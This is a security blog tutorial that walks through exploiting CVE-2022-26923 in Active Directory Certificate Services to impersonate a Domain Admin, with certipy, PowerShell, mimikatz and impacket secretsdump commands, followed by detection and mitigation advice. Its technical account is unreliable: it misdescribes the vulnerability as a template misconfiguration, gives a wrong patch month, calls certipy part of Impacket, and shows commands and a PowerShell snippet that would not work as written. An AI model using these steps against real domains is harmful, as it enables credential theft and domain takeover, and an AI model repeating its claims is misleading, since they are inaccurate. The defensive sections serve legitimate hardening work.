1034 words
5 minutes
Exploiting CVE-2022-26923 Abusing Active Directory Certificate Services
2025-04-10
Active Directory Attacks
CVEs

CVE‑2022‑26923: Abusing AD Certificate Services for Domain‑Admin Impersonation#

A deep‑dive into CVE‑2022‑26923—an Active Directory Certificate Services (ADCS) vulnerability that allows low‑privileged users to request and abuse privileged certificate templates. Learn how the exploit works step by step, see real‑world attack chains, and discover practical detection and mitigation strategies to safeguard your domain.

Table of Contents#

  1. Introduction
  2. What Is AD Certificate Services (ADCS)?
  3. How CVE‑2022‑26923 Works
    1. Accessing the Web Enrollment Interface
    2. Identifying Privileged Templates
    3. Crafting a Malicious Certificate Request
    4. Certificate Issuance Without Proper Checks
    5. Using the Privileged Certificate for Kerberos Impersonation
  4. Detailed Exploitation Walkthrough
    1. Prerequisites
    2. Enumerating Available Templates
    3. Crafting and Submitting the Malicious Request
    4. Certificate Injection via Mimikatz/Impacket
  5. Detection Strategies
    1. Monitoring Certificate Request Events (Event ID 4907)
    2. Reviewing Certificate Template Permissions
    3. Auditing CA Logs for Suspicious Activity
  6. Mitigation Best Practices
    1. Applying the March 2022 Windows Security Update
    2. Restricting Template Permissions to Authorized Users
    3. Disabling Web Enrollment When Unnecessary
    4. Continuous Auditing and Alerting
  7. Conclusion
  8. References and Further Reading

”CVE-2022-26923” Abusing Certificate Services in AD#

CVE-2022-26923 targets the Active Directory Certificate Services (ADCS), specifically the Web Enrollment interface. ADCS is responsible for managing and issuing certificates within an Active Directory environment, and it’s commonly used to issue certificates for authentication and encryption purposes.

This vulnerability occurs when certificate templates are misconfigured or insecurely configured, allowing a low-privileged user to request a certificate for a privileged template (e.g., Domain Admin). With this certificate, the attacker can escalate their privileges and impersonate a Domain Admin or other high-privileged accounts within the domain.

2. How CVE-2022-26923 Works#

Active Directory Certificate Services (ADCS)#

ADCS is part of the PKI infrastructure in Windows environments, and it provides services for issuing, managing, and revoking certificates. The Web Enrollment feature allows users to request certificates via a web interface (certsrv). Typically, an authorized user would request a certificate for things like user authentication or email encryption.

When certificate templates are misconfigured, even non-administrative users may be able to request certificates for privileged templates. These templates could allow users to impersonate Domain Admins, giving attackers a way to escalate their privileges.

Steps of the Exploit:#

  1. Accessing Web Enrollment:
    • The attacker accesses the Web Enrollment interface of the ADCS server via http://<CA-Server>/certsrv.
    • By default, this interface should require authentication, but the attacker is able to access it due to improper configurations or weak access control policies.
  2. Identifying Privileged Templates:
    • The attacker identifies available certificate templates using the Web Enrollment page. They specifically look for Domain Admin certificates or any templates that might allow the impersonation of high-privileged accounts.
  3. Crafting a Malicious Request:
    • Using tools such as PowerShell or Impacket, the attacker crafts a malicious certificate request. The request will be for a template that could allow a Domain Admin to be impersonated.
  4. Certificate Issuance:
    • In a misconfigured ADCS environment, the Certificate Authority (CA) will issue the certificate without proper checks, even though the attacker is not authorized for that template.
  5. Using the Privileged Certificate:
    • The attacker then uses tools like Mimikatz or Impacket to impersonate a Domain Admin with the issued certificate. The attacker can now authenticate as a Domain Admin, gaining full control of the domain.

3. Exploitation Process in Detail#

Here’s a step-by-step breakdown of the exploitation:

Step 1: Prerequisites#

  • Access to Web Enrollment page (http://<CA-Server>/certsrv).
  • Low-privileged user account.
  • Misconfigured Certificate Templates allowing unauthorized access.

Step 2: Enumerating Available Templates#

The attacker first needs to find the certificate templates that are available for request. The Web Enrollment page may allow them to do this by simply visiting the page.

Commands:#

using PowerShell to list certificate templates available to the user

# Using PowerShell to list certificate templates available to the user

Get-Certificate -Template

This command will list all the available certificate templates. The attacker will look for high-privileged templates, such as those associated with Domain Admins.

Alternatively, attackers can enumerate the templates using tools like Impacket.

Using Impacket to query for certificate templates
python3 [certipy.py](http://certipy.py/) enum -u <user> -p <password> -d <domain> -dc-ip <dc-ip>

Step 3: Crafting the Malicious Certificate Request#

Once the attacker identifies a privileged template (e.g., for Domain Admin certificates), they need to create a request for it.

  1. Using PowerShell: The attacker can use PowerShell to create a malicious request.
$certRequest = New-Object -ComObject X509Enrollment.CX509CertificateRequestPkcs10
$certRequest.InitializeFromTemplate(1, "DomainAdminTemplate")
$certRequest.Encode()
$certRequest.Submit()

**Using Certipy (Impacket)**:
Impacket’s **certipy** can also be used to craft and submit requests for certificates.

# Requesting a certificate for a domain controller template
python3 certipy.py req -u <user> -p <password> -t <template> -domain <domain> -dc-ip <dc-ip>

In this example, the attacker specifies the template that could be used to request a Domain Admin certificate.

Step 4: Certificate Issuance#

The CA issues the certificate because the request did not properly validate the attacker’s privileges.

  • The issued certificate can now be used for authentication.

Step 5: Using the Privileged Certificate#

Once the attacker has the privileged certificate, they can use tools like Mimikatz to inject the certificate into Kerberos authentication and impersonate a Domain Admin.

Using Mimikatz to Inject the Certificate:#

mimikatz.exe "kerberos::ptt <cert-file>"

This command injects the certificate into the Kerberos ticket cache, allowing the attacker to authenticate as a Domain Admin.

Alternatively, the attacker can use Impacket’s secretsdump.py or kerberos.py to perform further actions.

# Using Impacket to dump domain secrets after impersonation
python3 [impacket-secretsdump.py](http://impacket-secretsdump.py/) <domain>/<username>:<password> -just-dc

4. Detection and Mitigation#

Detection#

  1. Monitoring Certificate Requests:

    • Event ID 4907 logs certificate requests. Admins should monitor for unauthorized certificate requests, especially for high-privileged templates.

    Example Event ID for certificate request:

    Event ID 4907: A certificate request has been submitted.

  2. Certificate Template Permissions:

    • Ensure that permissions on certificate templates are restricted to authorized users only.
    • Review the Web Enrollment logs and configure proper access controls to prevent unauthorized access.

  3. Check CA Logs:

    • Review the Certificate Authority logs to detect suspicious certificate issuance requests or patterns.

Mitigation#

  1. Patch the Vulnerability:
    • Apply the March 2022 Windows Security Update to patch CVE-2022-26923.
  2. Restrict Certificate Template Permissions:
    • Only allow administrators to request privileged certificates. Limit permissions on sensitive templates such as Domain Admin or Domain Controller certificates.
  3. Disable Web Enrollment if not Needed:
    • If the Web Enrollment feature is not necessary, disable it entirely to prevent attackers from exploiting it.
  4. Audit and Monitor:
    • Set up continuous auditing of certificate templates and CA logs to detect unusual or unauthorized activity.

5. Conclusion#

CVE-2022-26923 is a serious vulnerability that allows an attacker to escalate their privileges in an Active Directory environment by exploiting misconfigured certificate templates in ADCS. Once the attacker gets hold of a privileged certificate, they can impersonate Domain Admins and take full control of the domain.

Mitigation strategies include patching the system, reviewing and restricting certificate template permissions, and disabling unnecessary features like Web Enrollment. Continuous monitoring and auditing are also critical to detect any signs of misuse or exploitation.

6. References and Further Reading#

Exploiting CVE-2022-26923 Abusing Active Directory Certificate Services
https://bad-glitch.github.io/posts/active-directory/cve22-26923/cve-2022-26923/
Author
Amr Abdel Hamide
Published at
2025-04-10
Exploiting CVE-2021-34527 Privilege Escalation (PrintNightmare)
DCSync Attack - Stealing the Entire Network Without Executing Code on the Server
© 2025 Amr Abdel Hamide. All Rights Reserved. / RSS / Sitemap